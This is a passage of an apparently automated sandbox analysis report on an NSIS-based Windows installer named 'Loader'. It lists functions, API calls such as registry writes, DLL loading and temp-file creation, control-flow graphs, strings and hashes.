                                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                                • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                                • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                                • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                                • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                                • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                                                • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                                                                Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 646 402880-402882 647 402884-402886 646->647 648 402888-40288e 646->648 649 402894-4028e2 call 40145c * 2 call 4061ec RegCreateKeyExW 647->649 648->649 656 4028e8-4028f3 649->656 657 4029ef-4029f5 649->657 659 4028f5-402916 call 40145c lstrlenW 656->659 660 402937-40293d 656->660 658 4030e3-4030f2 657->658 674 402918-402925 call 4062cf 659->674 675 40292a-402934 call 4062cf 659->675 661 402966-40296a 660->661 662 40293f-402963 call 401446 call 4062cf 660->662 666 40296c-4029ab call 40337f call 406250 call 4062cf 661->666 667 4029ae-4029c4 RegSetValueExW 661->667 662->661 666->667 670 4029c6-4029c9 667->670 671 4029cb-4029de call 4062cf 667->671 677 4029e1-4029ea RegCloseKey 670->677 671->677 674->667 675->660 677->658
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • RegCreateKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7eba5588e31dbe8d60aed41eef07a2ac5faacf0d5bbe736eb3a00d236a23317c
                                                                                                                                                                                                                                                                                                                • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eba5588e31dbe8d60aed41eef07a2ac5faacf0d5bbe736eb3a00d236a23317c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                                Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 691 40337f-403398 692 4033a1-4033a9 691->692 693 40339a 691->693 694 4033b2-4033b7 692->694 695 4033ab 692->695 693->692 696 4033c7-4033d4 call 403336 694->696 697 4033b9-4033c2 call 403368 694->697 695->694 701 4033d6 696->701 702 4033de-4033e5 696->702 697->696 703 4033d8-4033d9 701->703 704 403546-403548 702->704 705 4033eb-403432 GetTickCount 702->705 708 403567-40356b 703->708 706 40354a-40354d 704->706 707 4035ac-4035af 704->707 709 403564 705->709 710 403438-403440 705->710 711 403552-40355b call 403336 706->711 712 40354f 706->712 713 4035b1 707->713 714 40356e-403574 707->714 709->708 715 403442 710->715 716 403445-403453 call 403336 710->716 711->701 724 403561 711->724 712->711 713->709 719 403576 714->719 720 403579-403587 call 403336 714->720 715->716 716->701 725 403455-40345e 716->725 719->720 720->701 728 40358d-40359f WriteFile 720->728 724->709 727 403464-403484 call 4076a0 725->727 734 403538-40353a 727->734 735 40348a-40349d GetTickCount 727->735 730 4035a1-4035a4 728->730 731 40353f-403541 728->731 730->731 733 4035a6-4035a9 730->733 731->703 733->707 734->703 736 4034e8-4034ec 735->736 737 40349f-4034a7 735->737 738 40352d-403530 736->738 739 4034ee-4034f1 736->739 740 4034a9-4034ad 737->740 741 4034af-4034e5 MulDiv wsprintfW call 404f9e 737->741 738->710 745 403536 738->745 743 403513-40351e 739->743 744 4034f3-403507 WriteFile 739->744 740->736 740->741 741->736 748 403521-403525 743->748 744->731 747 403509-40350c 744->747 745->709 747->731 749 40350e-403511 747->749 748->727 750 40352b 748->750 749->748 750->709
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,0042B20B,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                                • String ID: ... %d%%$pAB$rstFileExA
                                                                                                                                                                                                                                                                                                                • API String ID: 651206458-2059934793
                                                                                                                                                                                                                                                                                                                • Opcode ID: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                                                                Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6c1c61ef5032ccf90c018dfb7ef966ae83b5c21018cc5ffe60bed7be14a03e13
                                                                                                                                                                                                                                                                                                                • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c1c61ef5032ccf90c018dfb7ef966ae83b5c21018cc5ffe60bed7be14a03e13
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                                                Function 004023F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 791 4023f0-4023fd 792 402403-402419 call 40145c * 2 791->792 793 4024e5-4024f1 call 404f9e 791->793 802 402429-402438 LoadLibraryExW 792->802 803 40241b-402427 GetModuleHandleW 792->803 799 4030e3-4030f2 793->799 805 4024ce-4024db call 404f9e 802->805 806 40243e-40244d call 406391 802->806 803->802 803->806 805->793 811 40248c-4024a4 call 404f9e call 4062cf 806->811 812 40244f-402455 806->812 822 4024a7-4024aa 811->822 813 402457-402463 call 401435 812->813 814 40246e-402482 812->814 813->822 826 402465-40246c 813->826 820 402487-40248a 814->820 820->822 822->799 823 4024b0-4024ba call 403ce4 822->823 823->799 828 4024c0-4024c9 FreeLibrary 823->828 826->822 828->799
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B20B,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 004024CE, 004024E5
                                                                                                                                                                                                                                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                                • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                                • API String ID: 1033533793-284255697
                                                                                                                                                                                                                                                                                                                • Opcode ID: 24a83029d4f3eb6b8224e6a0cc99006e4a6954edb210bc1d043aa7a0e93d4657
                                                                                                                                                                                                                                                                                                                • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24a83029d4f3eb6b8224e6a0cc99006e4a6954edb210bc1d043aa7a0e93d4657
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                                Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 829 401eb9-401ec4 830 401f24-401f26 829->830 831 401ec6-401ec9 829->831 832 401f53-401f69 GlobalAlloc call 406831 830->832 833 401f28-401f2a 830->833 834 401ed5-401ee3 call 4062cf 831->834 835 401ecb-401ecf 831->835 845 401f6e-401f7b 832->845 836 401f3c-401f4e call 406035 833->836 837 401f2c-401f36 call 4062cf 833->837 847 401ee4-402702 call 406831 834->847 835->831 838 401ed1-401ed3 835->838 851 402387-40238d GlobalFree 836->851 837->836 838->834 842 401ef7-402e50 call 406035 * 3 838->842 850 4030e3-4030f2 842->850 845->850 845->851 862 402708-40270e 847->862 851->850 862->850
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                                • String ID: Exch: stack < %d elements$Pop: stack empty$install
                                                                                                                                                                                                                                                                                                                • API String ID: 1459762280-2295550231
                                                                                                                                                                                                                                                                                                                • Opcode ID: d52fd3c27c1d8a4b36b5f090c2ffb04f70e5730621c2400cb1c3a8aa5bc04936
                                                                                                                                                                                                                                                                                                                • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d52fd3c27c1d8a4b36b5f090c2ffb04f70e5730621c2400cb1c3a8aa5bc04936
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                                                Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 864 405eab-405eb7 865 405eb8-405eec GetTickCount GetTempFileNameW 864->865 866 405efb-405efd 865->866 867 405eee-405ef0 865->867 869 405ef5-405ef8 866->869 867->865 868 405ef2 867->868 868->869
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
